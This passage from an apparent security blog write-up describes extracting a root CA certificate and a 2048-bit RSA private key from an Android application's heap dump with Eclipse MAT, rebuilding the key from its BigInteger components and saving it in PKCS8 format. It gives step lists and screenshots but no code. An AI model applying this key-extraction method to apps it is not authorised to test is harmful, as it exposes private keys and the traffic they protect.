<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSVIsqvgHN5VwnKhfglA_GFIxjkjXO5SYGOTHhOhDKGpOXHUIgCEzPfFqBEuXStquR6BchG-z1teGS3Unb3fj_n6kDxxErqHZsd3QMy63Us0FlmQP_1S1ovtAlKvTYqKgqWLmTxk4lZY_0/s1600/save-certificate-der.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSVIsqvgHN5VwnKhfglA_GFIxjkjXO5SYGOTHhOhDKGpOXHUIgCEzPfFqBEuXStquR6BchG-z1teGS3Unb3fj_n6kDxxErqHZsd3QMy63Us0FlmQP_1S1ovtAlKvTYqKgqWLmTxk4lZY_0/s400/save-certificate-der.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Image shows file saved as certificate-1.der </span></td></tr>
</tbody></table>
<b id="docs-internal-guid-435ae438-c1cc-c4f0-6c2a-1926fe8ef7cb" style="font-weight: normal;"><br /></b>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfo7bsdIlkJyrQnDkF3bFhg6TMvk1J5sL9lP_Yt_k9LUciHXFoiKfF42DeiVrxijIJQBZFtOUNCkqZScrXYkMW3ZkPkgMb_u_ev0biUC_eOV7nISQnA62NyguO9QfFLKqEz07UKbKCB5RD/s1600/cert-web-cd.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfo7bsdIlkJyrQnDkF3bFhg6TMvk1J5sL9lP_Yt_k9LUciHXFoiKfF42DeiVrxijIJQBZFtOUNCkqZScrXYkMW3ZkPkgMb_u_ev0biUC_eOV7nISQnA62NyguO9QfFLKqEz07UKbKCB5RD/s320/cert-web-cd.png" width="259" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;"> Image shows the extracted Root CA certificate from the Android application</span></td></tr>
</tbody></table>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<h3 style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Extracting the RSAPrivateCrtKey</span></span></h3>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The second important component was the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKey</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and extracting it was a little more involved as we will see below. To summarize, the below provided steps were followed to retrieve the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateKeyCrtKey</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Locate components that make up the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivatecrtKeySpec</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Copy all the components and store them in file system</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Compute positive </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> values from these components</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Construct </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivatecrtKeySpec</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> from its components</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Use the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivatecrtKeySpec</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> object to construct </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivatecrtKey</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Write the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivatecrtKey</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to the file system in </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PKCS8</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> format</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">And optionally:</span></div>
</li>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: lower-alpha; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Convert </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PKCS8</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PEM</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> using </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">OpenSSL</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: lower-alpha; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Extract public key from the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PEM</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> file with </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">OpenSSL</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
</li>
</ol>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let us now look at the involved details. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The third component from Figure 1 corresponds to an instance of </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivatecrtKeySpec</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> which was the starting point to construct the key. Selecting the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">com.android.org.bouncycastle.jcajce.provider.asymmetric.rsa.BCRSAPrivateCrtKey</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> entry in the MAT’s Dominator Tree populated the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Attributes</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> tab with the information (type, instance name and object reference) pertaining to the several participating </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instances that are required to build this </span><a href="http://docs.oracle.com/javase/7/docs/api/java/security/spec/RSAPrivateCrtKeySpec.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKeySpec</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. The following are the participating </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">components that make up a </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKeySpec</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">modulus</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">publicExponent</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">privateExponent</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">primeP</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">primeQ</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">primeExponentP</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">primeExponentQ</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">crtCoefficient</span></div>
</li>
</ol>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I used this information to segregate the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> component values to different variables as their values were copied out to the file system (see figure below). For example, the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">crtCoefficient at @0x410b0080</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in the Attributes tab (left) was mapped to an array of 32 integers (right). The modulus at </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">@0x410afde0</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> was 64 int’s long which indicated that the key size was 2048 bits. Since MAT does not know how to export </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> objects, I used the actual </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">int[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> reference inside the corresponding </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> dropdown to copy out the binary content. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">That is, I right clicked on the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">int[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> dropdowns under the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> while exporting their content. This process was repeated for all the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> components to 8 local files and the files were named as per the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Attribute</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> names. The following two images show the Attributes pane and the corresponding </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">int[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> content dump.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixIT0IyMdvJXi9riyP0QFVLD0t6GE8zJeTlId43QPy4Q180aXgnSaO3MG7WH1UX8yZ1F2PONCAkBNkKybT4JMzySlV6oiIfenMNR4d287kby8KSZ_I1-BIw9MRAZ-c457-dfhMNbUvxfuj/s1600/coefficients-marked.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixIT0IyMdvJXi9riyP0QFVLD0t6GE8zJeTlId43QPy4Q180aXgnSaO3MG7WH1UX8yZ1F2PONCAkBNkKybT4JMzySlV6oiIfenMNR4d287kby8KSZ_I1-BIw9MRAZ-c457-dfhMNbUvxfuj/s400/coefficients-marked.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Image shows the Atrributes and corresponding BigInteger objects in the heap</span></td></tr>
</tbody></table>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj08gzmig5gfycCGFIEa7Bj5JkTYLXEAgNfOHbyvo2azM_VA6sb5CUO6lt9B0seDKnt1In14132HpJOfKfZyY9HmJbwsPKdnMPg2Wy3TnSNWFzEISGTQ6Boa3OPFuZ2QkAOJnTBcEMCLI3i/s1600/coefficient-save-value-as.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj08gzmig5gfycCGFIEa7Bj5JkTYLXEAgNfOHbyvo2azM_VA6sb5CUO6lt9B0seDKnt1In14132HpJOfKfZyY9HmJbwsPKdnMPg2Wy3TnSNWFzEISGTQ6Boa3OPFuZ2QkAOJnTBcEMCLI3i/s400/coefficient-save-value-as.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Image shows int[64] selected to export the binary representation of the array</span></td></tr>
</tbody></table>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
